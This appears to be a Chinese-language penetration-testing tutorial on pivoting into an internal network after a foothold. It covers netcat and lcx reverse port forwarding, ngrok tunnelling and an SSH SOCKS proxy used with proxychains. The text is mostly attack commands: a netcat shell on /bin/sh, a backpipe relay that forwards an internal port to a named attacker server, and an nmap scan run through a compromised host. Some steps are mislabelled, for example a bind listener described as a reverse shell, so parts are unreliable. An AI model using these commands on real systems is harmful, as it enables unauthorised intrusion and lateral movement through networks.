目錄:lcx端口反向轉發、搭建ngrok內網穿透轉發端口、proxychains掃描內網主機
敘述:
有時候我們常常會在**的時候,碰到一個內網環境。有一些端口是隻有內部才能夠訪問到的,那麼,我們爲了訪問到這個端口,就需要對端口進行轉發。。。
當然,這有一個前提:內網的主機能夠與外網相連接-------&bugfor首發:槿華*&
當然,如果碰到內網主機無法訪問外網的情況,咱們就使用“proxychains掃描內網主機”,稍後也會描述這個方法
0x0 環境
內網:180.101.148.103
內網主機A(web服務器):172.19.0.3 他把80端口通過路由映射到外網
內網主機B(linux):172.19.0.2 他把端口22通過路由映射到外網
內網主機C(linux):172.19.0.1
***機服務器:49.233.160.31
0x1 netcat、lcx端口反向轉發
需要用到的東西:netcat工具、lcx工具、一臺遠程服務器
前提:內網的主機能夠與外網相連接
**·linux主機映射shell窗口到*機服務器(使用netcat)
遠程服務器開啓一個nc:
nc.exe -n -vv -l -p 8888 #開啓nc監聽8888端口
內網主機反彈shell到 遠程服務器的8888端口:
nc -l -p 8888 -t -e /bin/sh
**·linux主機映射內網端口窗口到*機服務器(使用netcat+lcx)
遠程服務器開啓一個lcx:
lcx.exe -listen 8888 8989 #監聽8888端口,然後開啓8989端口內網主機8009端口到 遠程服務器的8888端口:
netcat -l 8009 0<backpipe | nc 49.233.160.31 8888 1>backpipe #將內網的8009端口 反彈到 遠程服務器的8888端口說明:這個時候你就可以在你的***機訪問/掃描127.0.0.1:8989了,掃描即是掃描內網的8009
·windows方法
同上,你只需要上傳nc、lcx即可,唯一不同的是上傳的文件不一樣。。。
0x2 ngrok內網穿透轉發端口
需要用到的東西:ngrok、一臺遠程服務器、可正常使用的域名(port.ngrok.xyz)
前提:內網的主機能夠與外網相連接
·使用ngrok映射內網端口到域名
上傳ngrok,然後執行以下命令:
./ngrok -subdomain demo -config ./ngrok.cfg -proto=tcp 1231 #將本地的1231端口映射到域名你也可以通過修改配置文件來執行,映射端口1231:
server_addr: "port.ngrok.xyz:4443"
trust_host_root_certs: false
tunnels:
demo:
remote_port: 50000
proto:
tcp: 1231然後執行命令即可:
./ngrok -config ./ngrok.cfg start demo ##將本地的1231端口映射到域名port.ngrok.xyz:50000你訪問域名port.ngrok.xyz:50000 即是訪問內網的1231端口了
0x3 proxychains掃描內網主機
前提:內網的主機無法與外網相連接,僅能通過內網主機訪問;一臺可控的內網linux主機
需要用到的東西:
①拿到權限的內網主機B(linux)--172.19.0.2
②目標:內網主機C(linux)--172.19.0.1
·使用kali掃描目標服務器
sudo apt install proxychains #安裝
vi /etc/ssh/sshd_config #修改配置文件,如下AllowTcpForwarding yes
GatewayPorts yes~~
sudo apt install lrzsz
ssh -i AD-Learning.pem [email protected] -D 8888 #連接內網主機B(端口22映射了的),然後kali在本地開啓一個8888端口監聽
vi /etc/proxychains.conf #修改配置文件,如下:socks5 127.0.0.1 8888
好了,到了這一步就配置完成了,這樣你就可以掃描內網主機C了:
proxychains nmap -p88 172.19.0.1 -n